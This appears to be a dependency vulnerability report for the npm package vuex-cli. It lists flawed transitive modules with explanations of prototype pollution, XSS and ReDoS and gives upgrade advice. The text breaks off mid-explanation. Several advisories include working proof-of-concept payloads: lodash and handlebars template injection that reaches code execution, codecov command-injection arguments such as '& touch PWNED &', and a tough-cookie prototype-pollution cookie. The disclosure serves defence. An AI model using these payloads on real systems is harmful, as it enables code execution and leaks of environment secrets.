Affected versions of this package are vulnerable to Code Injection due the improper validation of options.variable key names in _.template. An attacker can execute arbitrary code at template compilation time by injecting malicious expressions. If Object.prototype has been polluted, inherited properties may also be copied into the imports object and executed.

PoC

var _ = require('lodash');

_.template('', { variable: '){console.log(process.env)}; with(obj' })()

Remediation

Upgrade lodash to version 4.17.21 or higher.

References

high severity

Code Injection

  • Vulnerable module: lodash.template
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-initial@1.5.3 lodash.template@4.18.1

Overview

lodash.template is a The Lodash method _.template exported as a Node.js module.

Affected versions of this package are vulnerable to Code Injection due the improper validation of options.variable key names in _.template. An attacker can execute arbitrary code at template compilation time by injecting malicious expressions. If Object.prototype has been polluted, inherited properties may also be copied into the imports object and executed.

PoC

var _ = require('lodash');

_.template('', { variable: '){console.log(process.env)}; with(obj' })()

Remediation

There is no fixed version for lodash.template.

References

high severity

Improper Privilege Management

  • Vulnerable module: shelljs
  • Introduced through: shelljs@0.6.1 and vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli shelljs@0.6.1
    Remediation: Upgrade to shelljs@0.8.5.
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 shelljs@0.5.3

Overview

shelljs is a wrapper for the Unix shell commands for Node.js.

Affected versions of this package are vulnerable to Improper Privilege Management. When ShellJS is used to create shell scripts which may be running as root, users with low-level privileges on the system can leak sensitive information such as passwords (depending on implementation) from the standard output of the privileged process OR shutdown privileged ShellJS processes via the exec function when triggering EACCESS errors.

Note: Thi only impacts the synchronous version of shell.exec().

Remediation

Upgrade shelljs to version 0.8.5 or higher.

References

high severity

Remote Code Execution (RCE)

  • Vulnerable module: handlebars
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 handlebars@1.3.0

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.

POC

<script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script> 
<script> 
// compile the template 
var s = ` 
{{#with (__lookupGetter__ "__proto__")}} 
{{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}} 
{{#with ../constructor.prototype}} 
{{../../constructor.defineProperty . "hasOwnProperty" ..}} 
{{/with}} 
{{/with}} 
{{/with}} 
{{#with "constructor"}} 
{{#with split}} 
{{pop (push "alert('Vulnerable Handlebars JS when compiling in strict mode');")}} 
{{#with .}} 
{{#with (concat (lookup join (slice 0 1)))}} 
{{#each (slice 2 3)}} 
{{#with (apply 0 ../..)}} 
{{.}} 
{{/with}} 
{{/each}} 
{{/with}} 
{{/with}} 
{{/with}} 
{{/with}} 
`;
var template = Handlebars.compile(s, { 
strict: true 
}); 
// execute the compiled template and print the output to the console console.log(template({})); 
</script>

Remediation

Upgrade handlebars to version 4.7.7 or higher.

References

medium severity

Prototype Pollution

  • Vulnerable module: js-yaml
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-svgo@2.1.6 svgo@0.7.2 js-yaml@3.7.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-svgo@2.1.6 svgo@0.7.2 js-yaml@3.7.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 js-yaml@3.4.5

Overview

js-yaml is a human-friendly data serialization language.

Affected versions of this package are vulnerable to Prototype Pollution via the merge function. An attacker can alter object prototypes by supplying specially crafted YAML documents containing __proto__ properties. This can lead to unexpected behavior or security issues in applications that process untrusted YAML input.

Workaround

This vulnerability can be mitigated by running the server with node --disable-proto=delete or by using Deno, which has pollution protection enabled by default.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade js-yaml to version 3.14.2, 4.1.1 or higher.

References

medium severity

Command Injection

  • Vulnerable module: codecov
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 codecov@1.0.1

Overview

codecov is a npm package for uploading reports to Codecov.

Affected versions of this package are vulnerable to Command Injection. The value provided as part of the gcov-args argument is executed by the exec function within lib/codecov.js.

PoC by JHU System Security Lab

var root = require("codecov");
var args = {
  "options": {
    'gcov-args': "& touch PWNED &"
  }
}
root.handleInput.upload(args, function(){}, function(){});

Remediation

Upgrade codecov to version 3.6.2 or higher.

References

medium severity

Command Injection

  • Vulnerable module: codecov
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 codecov@1.0.1

Overview

codecov is a npm package for uploading reports to Codecov.

Affected versions of this package are vulnerable to Command Injection. The value provided as part of the gcov-root argument is executed by the exec function within lib/codecov.js. This vulnerability exists due to an incomplete fix of CVE-2020-7596.

PoC by JHU System Security Lab

var root = require("codecov");
var args = {
  "options": {
    'gcov-root': "& touch exploit &",
    'gcov-exec': ' ',
    'gcov-args': ' '
  }
}
root.handleInput.upload(args, function(){}, function(){});

Remediation

Upgrade codecov to version 3.6.5 or higher.

References

medium severity

Command Injection

  • Vulnerable module: codecov
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 codecov@1.0.1

Overview

codecov is a npm package for uploading reports to Codecov.

Affected versions of this package are vulnerable to Command Injection via the upload method.

Note: This vulnerability exists due to an incomplete fix of CVE-2020-7597.

Remediation

Upgrade codecov to version 3.7.1 or higher.

References

medium severity

Prototype Pollution

  • Vulnerable module: handlebars
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 handlebars@1.3.0

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Prototype Pollution. Prototype access to the template engine allows for potential code execution.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade handlebars to version 4.6.0 or higher.

References

medium severity

Server-Side Request Forgery (SSRF)

  • Vulnerable module: ip
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 ip@1.1.9

Overview

ip is a Node library.

Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF) via the isPublic function, which identifies some private IP addresses as public addresses due to improper parsing of the input. An attacker can manipulate a system that uses isLoopback(), isPrivate() and isPublic functions to guard outgoing network requests to treat certain IP addresses as globally routable by supplying specially crafted IP addresses.

Note

This vulnerability derived from an incomplete fix for CVE-2023-42282

Remediation

There is no fixed version for ip.

References

medium severity

Server-side Request Forgery (SSRF)

  • Vulnerable module: request
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 codecov@1.0.1 request@2.88.2
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 koa-proxy@0.6.0 co-request@0.2.1 request@2.88.2
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 request@2.88.2
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-github@0.14.14 request@2.88.2
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 request@2.88.2

Overview

request is a simplified http request client.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to insufficient checks in the lib/redirect.js file by allowing insecure redirects in the default configuration, via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).

NOTE: request package has been deprecated, so a fix is not expected. See https://github.com/request/request/issues/3142.

Remediation

A fix was pushed into the master branch but not yet published.

References

medium severity

Prototype Pollution

  • Vulnerable module: tough-cookie
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 codecov@1.0.1 request@2.88.2 tough-cookie@2.5.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 koa-proxy@0.6.0 co-request@0.2.1 request@2.88.2 tough-cookie@2.5.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 request@2.88.2 tough-cookie@2.5.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-github@0.14.14 request@2.88.2 tough-cookie@2.5.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 request@2.88.2 tough-cookie@2.5.0

Overview

tough-cookie is a RFC6265 Cookies and CookieJar module for Node.js.

Affected versions of this package are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. Due to an issue with the manner in which the objects are initialized, an attacker can expose or modify a limited amount of property information on those objects. There is no impact to availability.

PoC

// PoC.js
async function main(){
var tough = require("tough-cookie");
var cookiejar = new tough.CookieJar(undefined,{rejectPublicSuffixes:false});
// Exploit cookie
await cookiejar.setCookie(
  "Slonser=polluted; Domain=__proto__; Path=/notauth",
  "https://__proto__/admin"
);
// normal cookie
var cookie = await cookiejar.setCookie(
  "Auth=Lol; Domain=google.com; Path=/notauth",
  "https://google.com/"
);

//Exploit cookie
var a = {};
console.log(a["/notauth"]["Slonser"])
}
main();

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade tough-cookie to version 4.1.3 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: vue
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue@1.0.28

Overview

vue is a Reactive, component-oriented view layer for modern web interfaces.

Affected versions of the package are vulnerable to Cross-site Scripting (XSS).

Details

<>

You can read more about Cross-site Scripting (XSS) on our blog.

Remediation

Upgrade vue to version 2.3.0-beta.1 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: vue
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue@1.0.28

Overview

vue is a Reactive, component-oriented view layer for modern web interfaces.

Affected versions of the package are vulnerable to Cross-site Scripting (XSS).

Details

<>

You can read more about Cross-site Scripting (XSS) on our blog.

Remediation

Upgrade vue to version 2.4.3 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: vue
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue@1.0.28

Overview

vue is an open source project with its ongoing development made possible entirely by the support of these awesome backers.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) when spread attributes in the ssr files are unsanitized and can therefore be attack vectors for untrusted user input.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade vue to version 2.5.17 or higher.

References

medium severity

Improper Input Validation

  • Vulnerable module: xmldom
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 img-stats@0.5.2 xmldom@0.1.31

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to Improper Input Validation. It does not correctly escape special characters when serializing elements are removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications.

Note: Customers who use "xmldom" package, should use "@xmldom/xmldom" instead, as "xmldom" is no longer maintained.

Remediation

There is no fixed version for xmldom.

References

medium severity

Prototype Pollution

  • Vulnerable module: json5
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-core@6.26.3 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-register@6.26.0 babel-core@6.26.3 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 babel-core@6.26.3 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-loader@6.4.1 loader-utils@0.2.17 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 loader-utils@0.2.17 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 extract-text-webpack-plugin@1.0.1 loader-utils@0.2.17 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 file-loader@0.9.0 loader-utils@0.2.17 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 html-webpack-plugin@2.30.1 loader-utils@0.2.17 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 imports-loader@0.6.5 loader-utils@0.2.17 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-loader@0.9.1 loader-utils@0.2.17 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-style-loader@1.0.0 loader-utils@0.2.17 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 loader-utils@0.2.17 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-core@6.26.3 babel-register@6.26.0 babel-core@6.26.3 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 babel-register@6.26.0 babel-core@6.26.3 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 babel-core@6.26.3 json5@0.5.1
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 babel-core@6.26.3 babel-register@6.26.0 babel-core@6.26.3 json5@0.5.1

Overview

Affected versions of this package are vulnerable to Prototype Pollution via the parse method , which does not restrict parsing of keys named __proto__, allowing specially crafted strings to pollute the prototype of the resulting object. This pollutes the prototype of the object returned by JSON5.parse and not the global Object prototype (which is the commonly understood definition of Prototype Pollution). Therefore, the actual impact will depend on how applications utilize the returned object and how they filter unwanted keys.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade json5 to version 1.0.2, 2.2.2 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: diff
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 mocha@2.5.3 diff@1.4.0

Overview

diff is a javascript text differencing implementation.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the parsePatch() and applyPatch() functions if the user input passed without sanitisation. An attacker can cause the process to enter an infinite loop and exhaust system memory by providing a patch with filename headers containing \r, \u2028, or \u2029 characters or having control over patch's patch header for application generated patches.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
